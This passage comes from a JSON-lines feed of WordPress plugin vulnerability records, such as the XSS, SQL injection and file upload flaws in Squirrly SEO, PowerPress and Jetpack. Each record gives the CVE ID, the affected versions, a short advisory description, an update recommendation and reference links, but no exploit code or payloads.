version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3657384e-025a-44ad-8b7e-1a2fea17dcc3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3657384e-025a-44ad-8b7e-1a2fea17dcc3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-blocks.php#L347\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-blocks.php#L347\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-admin.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-admin.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079691\\\/buddypress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079691\\\/buddypress\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2929","slug":"order-delivery-date","versionEndExcluding":"12.4.0","description":"The Order Delivery Date WordPress plugin before 12.4.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 12.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9299d8f-900b-4487-b135-b82946825e61\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9299d8f-900b-4487-b135-b82946825e61\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10515","slug":"squirrly-seo","versionImpact":"12.3.20","versionEndExcluding":"12.3.21","description":"In the process of testing the SEO Plugin by Squirrly SEO WordPress plugin before 12.3.21, a vulnerability was found that allows you to implement Stored XSS on behalf of the editor by embedding malicious script, which entails account takeover backdoor","recommendation":"Update to version 12.3.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/367aad17-fbb5-48eb-8829-5d3513098d02\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/367aad17-fbb5-48eb-8829-5d3513098d02\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0597","slug":"squirrly-seo","versionImpact":"12.3.15","versionEndExcluding":"12.3.16","description":"The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 12.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 12.3.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023398\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023398\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2907","slug":"order-delivery-date","versionEndExcluding":"12.3.1","description":"The Order Delivery Date WordPress plugin before 12.3.1 does not have authorization and CSRF checks when importing settings. Furthermore it also lacks proper checks to only update options relevant to the Order Delivery Date WordPress plugin before 12.3.1. This leads to attackers being able to modify the default_user_role to administrator and users_can_register, allowing them to register as an administrator of the site for complete site takeover.","recommendation":"Update to version 12.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e513930-ec01-4dc6-8991-645c5267e14c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e513930-ec01-4dc6-8991-645c5267e14c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0260","slug":"wp-facebook-reviews","versionEndExcluding":"12.2","description":"The WP Review Slider WordPress plugin before 12.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9165d46b-2a27-4e83-a096-73ffe9057c80\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9165d46b-2a27-4e83-a096-73ffe9057c80\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2996","slug":"jetpack","versionEndExcluding":"12.1.1","description":"The Jetpack WordPress plugin before 12.1.1 does not validate uploaded files, allowing users with author roles or above to manipulate existing files on the site, deleting arbitrary files, and in rare cases achieve Remote Code Execution via phar deserialization.","refs":"[{\"url\":\"https:\\\/\\\/jetpack.com\\\/blog\\\/jetpack-12-1-1-critical-security-update\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/blog\\\/jetpack-12-1-1-critical-security-update\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52d221bd-ae42-435d-a90a-60a5ae530663\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52d221bd-ae42-435d-a90a-60a5ae530663\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5438","slug":"wp-image-slideshow","versionImpact":"12.0","versionEndExcluding":"12.1","description":"The wp image slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 12.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985394\\\/wp-image-slideshow#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985394\\\/wp-image-slideshow#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-slideshow\\\/trunk\\\/wp-image-slideshow.php?rev=2827205#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-slideshow\\\/trunk\\\/wp-image-slideshow.php?rev=2827205#L189\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e24383b-5b0f-4114-908b-4c2778632f73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e24383b-5b0f-4114-908b-4c2778632f73?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5437","slug":"wp-fade-in-text-news","versionImpact":"12.0","versionEndExcluding":"12.1","description":"The WP fade in text news plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 12.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4accf10-710e-4cba-8d61-04e422324f9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4accf10-710e-4cba-8d61-04e422324f9d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985398\\\/wp-fade-in-text-news#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985398\\\/wp-fade-in-text-news#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-fade-in-text-news\\\/trunk\\\/wp-fade-in-text-news.php?rev=2827202#L236\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-fade-in-text-news\\\/trunk\\\/wp-fade-in-text-news.php?rev=2827202#L236\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5435","slug":"up-down-image-slideshow-gallery","versionImpact":"12.0","versionEndExcluding":"12.1","description":"The Up down image slideshow gallery plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 12.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/up-down-image-slideshow-gallery\\\/trunk\\\/up-down-image-slideshow-gallery.php?rev=2827173#L208\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/up-down-image-slideshow-gallery\\\/trunk\\\/up-down-image-slideshow-gallery.php?rev=2827173#L208\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b72cf6f-4924-4fa5-8e1a-4054dfe73be0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b72cf6f-4924-4fa5-8e1a-4054dfe73be0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985497\\\/up-down-image-slideshow-gallery#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985497\\\/up-down-image-slideshow-gallery#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5431","slug":"left-right-image-slideshow-gallery","versionImpact":"12.0","versionEndExcluding":"12.1","description":"The Left right image slideshow gallery plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 12.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69902627-ce79-4a43-8949-43db6a9cc0dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69902627-ce79-4a43-8949-43db6a9cc0dd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/left-right-image-slideshow-gallery\\\/trunk\\\/left-right-image-slideshow-gallery.php?rev=2827127#L211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/left-right-image-slideshow-gallery\\\/trunk\\\/left-right-image-slideshow-gallery.php?rev=2827127#L211\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985417\\\/left-right-image-slideshow-gallery#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985417\\\/left-right-image-slideshow-gallery#file0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0099","slug":"simple-urls","versionEndExcluding":"115","description":"The Simple URLs WordPress plugin before 115 does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd50f2d6-e420-4220-b485-73f33227e8f8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd50f2d6-e420-4220-b485-73f33227e8f8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0098","slug":"simple-urls","versionEndExcluding":"115","description":"The Simple URLs WordPress plugin before 115 does not escape some parameters before using them in various SQL statements used by AJAX actions available by any authenticated users, leading to a SQL injection exploitable by low privilege users such as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db0b3275-40df-404e-aa8d-53558f0122d8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db0b3275-40df-404e-aa8d-53558f0122d8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9543","slug":"powerpress","versionImpact":"11.9.18","versionEndExcluding":"11.9.19","description":"The PowerPress Podcasting plugin by Blubrry plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'skipto' shortcode in all versions up to, and including, 11.9.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 11.9.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b33c180-10b4-4550-8c24-72c9e53664a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b33c180-10b4-4550-8c24-72c9e53664a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/tags\\\/11.9.17\\\/powerpress-player.php#L1748\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/tags\\\/11.9.17\\\/powerpress-player.php#L1748\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/tags\\\/11.9.17\\\/powerpress.php#L4094\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/tags\\\/11.9.17\\\/powerpress.php#L4094\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blubrry.com\\\/support\\\/powerpress-documentation\\\/skip-to-position-in-player\\\/\",\"name\":\"https:\\\/\\\/blubrry.com\\\/support\\\/powerpress-documentation\\\/skip-to-position-in-player\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166085\\\/powerpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166085\\\/powerpress\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9230","slug":"powerpress","versionImpact":"11.9.17","versionEndExcluding":"11.9.18","description":"The PowerPress Podcasting plugin by Blubrry WordPress plugin before 11.9.18 does not sanitise and escape some of its settings when adding a podcast, which could allow author and above users to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 11.9.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab5eaf57-fb61-4a08-b439-42dea40b7914\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab5eaf57-fb61-4a08-b439-42dea40b7914\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9227","slug":"powerpress","versionImpact":"11.9.17","versionEndExcluding":"11.9.18","description":"The PowerPress Podcasting plugin by Blubrry WordPress plugin before 11.9.18 does not sanitise and escape some of its settings when adding a podcast, which could allow admin users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","recommendation":"Update to version 11.9.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb6515b9-a316-4146-8b7d-9b70a47aa366\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb6515b9-a316-4146-8b7d-9b70a47aa366\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6037","slug":"wp-tripadvisor-review-slider","versionImpact":"11.8","versionEndExcluding":"11.9","description":"The WP TripAdvisor Review Slider WordPress plugin before 11.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 11.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/753df046-9fd7-4d15-9114-45cde6d6539b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/753df046-9fd7-4d15-9114-45cde6d6539b\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0259","slug":"wp-google-places-review-slider","versionEndExcluding":"11.8","description":"The WP Google Review Slider WordPress plugin before 11.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3bb0eac-1f4e-4191-8f3b-104a5bb54558\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3bb0eac-1f4e-4191-8f3b-104a5bb54558\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47554","slug":"css3_web_pricing_tables_grids","versionImpact":"11.6","versionEndExcluding":"11.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QuanticaLabs CSS3 Compare Pricing Tables for WordPress allows Reflected XSS. This issue affects CSS3 Compare Pricing Tables for WordPress: from n\/a through 11.6.","recommendation":"Update to version 11.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_web_pricing_tables_grids\\\/vulnerability\\\/wordpress-css3-compare-pricing-tables-for-wordpress-plugin-11-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_web_pricing_tables_grids\\\/vulnerability\\\/wordpress-css3-compare-pricing-tables-for-wordpress-plugin-11-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12420","slug":"wpappninja","versionImpact":"11.52","versionEndExcluding":"11.53","description":"The The WPMobile.App \u2014 Android and iOS Mobile Application plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 11.52. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 11.53, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207040%40wpappninja&new=3207040%40wpappninja&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207040%40wpappninja&new=3207040%40wpappninja&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad03e3f-fb3e-4a80-9eea-d24459ed62b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad03e3f-fb3e-4a80-9eea-d24459ed62b8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11804","slug":"planaday-api","versionImpact":"11.4","versionEndExcluding":"11.5","description":"The Planaday API plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 11.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 11.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204693%40planaday-api&new=3204693%40planaday-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204693%40planaday-api&new=3204693%40planaday-api&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/910cf7bd-1c2b-4e08-9088-e95ea6867ac3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/910cf7bd-1c2b-4e08-9088-e95ea6867ac3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9204","slug":"404page","versionImpact":"11.4.7","versionEndExcluding":"11.4.8","description":"The Smart Custom 404 Error Page plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 11.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 11.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93928123-c90d-4bbb-b51d-33e809867b79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93928123-c90d-4bbb-b51d-33e809867b79?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404page\\\/tags\\\/11.4.7\\\/inc\\\/class-404page.php#L1227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404page\\\/tags\\\/11.4.7\\\/inc\\\/class-404page.php#L1227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404page\\\/tags\\\/11.4.7\\\/functions.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404page\\\/tags\\\/11.4.7\\\/functions.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161639\\\/#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161639\\\/#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3616","slug":"greenshift-animation-and-page-builder-blocks","versionImpact":"11.4.5","versionEndExcluding":"11.4.6","description":"The Greenshift \u2013 animation and page builder blocks plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the gspb_make_proxy_api_request() function in versions 11.4 to 11.4.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The arbitrary file upload was sufficiently patched in 11.4.5, but a capability check was added in 11.4.6 to properly prevent unauthorized limited file uploads.","recommendation":"Update to version 11.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php#L3340\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php#L3340\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270279\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270279\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3273212\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3273212\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276168\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276168\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0db4671e-1989-44a4-babe-ed699c7f3a52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0db4671e-1989-44a4-babe-ed699c7f3a52?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4930","slug":"front-end-pm","versionEndExcluding":"11.4.3","description":"The Front End PM WordPress plugin before 11.4.3 does not block listing the contents of the directories where it stores attachments to private messages, allowing unauthenticated visitors to list and download private attachments if the autoindex feature of the web server is enabled.","recommendation":"Update to version 11.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c73b3276-e6f1-4f22-a888-025e5d0504f2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c73b3276-e6f1-4f22-a888-025e5d0504f2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4019","slug":"media-from-ftp","versionEndExcluding":"11.17","description":"The Media from FTP WordPress plugin before 11.17 does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d323b07-c6e7-4aba-85bc-64659ad0c85d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d323b07-c6e7-4aba-85bc-64659ad0c85d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5879","slug":"leadin","versionImpact":"11.1.22","versionEndExcluding":"11.1.34","description":"The HubSpot \u2013 CRM, Email Marketing, Live Chat, Forms & Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute of the HubSpot Meeting Widget in all versions up to, and including, 11.1.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 11.1.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac004fb0-e178-4e9b-9aa3-b14eab43f22d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac004fb0-e178-4e9b-9aa3-b14eab43f22d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leadin\\\/tags\\\/11.1.13\\\/public\\\/admin\\\/widgets\\\/class-elementormeeting.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leadin\\\/tags\\\/11.1.13\\\/public\\\/admin\\\/widgets\\\/class-elementormeeting.php#L108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123662\\\/leadin\\\/trunk\\\/public\\\/admin\\\/widgets\\\/class-elementormeeting.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123662\\\/leadin\\\/trunk\\\/public\\\/admin\\\/widgets\\\/class-elementormeeting.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4820","slug":"powerpress","versionEndExcluding":"11.0.12","description":"The PowerPress Podcasting plugin by Blubrry WordPress plugin before 11.0.12 does not sanitize and escape the media url field in posts, which could allow users with privileges as low as contributor to inject arbitrary web scripts that could target a site admin or superadmin.","recommendation":"Update to version 11.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e866a214-a142-43c7-b93d-ff2301a3e432\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e866a214-a142-43c7-b93d-ff2301a3e432\",\"refsource\":\"MISC\",\"tags\":[]}]"}
